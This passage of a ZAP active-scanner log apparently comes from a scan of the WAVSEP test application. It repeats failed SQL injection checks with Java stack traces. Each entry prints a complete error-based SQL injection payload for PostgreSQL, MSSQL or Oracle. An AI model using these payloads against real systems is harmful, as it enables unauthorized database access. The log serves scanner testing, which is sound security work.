org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922377 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 5482=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5482=5482) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('ToJN'='ToJN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 5482=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5482=5482) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('ToJN'='ToJN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922379 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 6664=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6664=6664) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'jIem'='jIem] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 6664=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6664=6664) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'jIem'='jIem at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922382 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 9442=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9442=9442) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 9442=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9442=9442) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922383 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 8292=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8292=8292) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- uvZw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 8292=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8292=8292) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- uvZw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922385 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 2955=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2955=2955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (1618=1618] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 2955=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2955=2955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (1618=1618 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922386 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 5997=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5997=5997) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 5997=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5997=5997) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922389 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 7596=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7596=7596) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('LcqF'='LcqF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 7596=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7596=7596) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('LcqF'='LcqF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922391 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 5505=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5505=5505) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'eLtE'='eLtE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 5505=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5505=5505) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'eLtE'='eLtE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922392 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 8629=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8629=8629) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 8629=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8629=8629) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922394 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 2066=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2066=2066) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- wntm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 2066=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2066=2066) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- wntm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922400 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 6231=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6231=6231) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (7037=7037] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 6231=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6231=6231) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (7037=7037 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922402 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 5490=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5490=5490) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 5490=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN 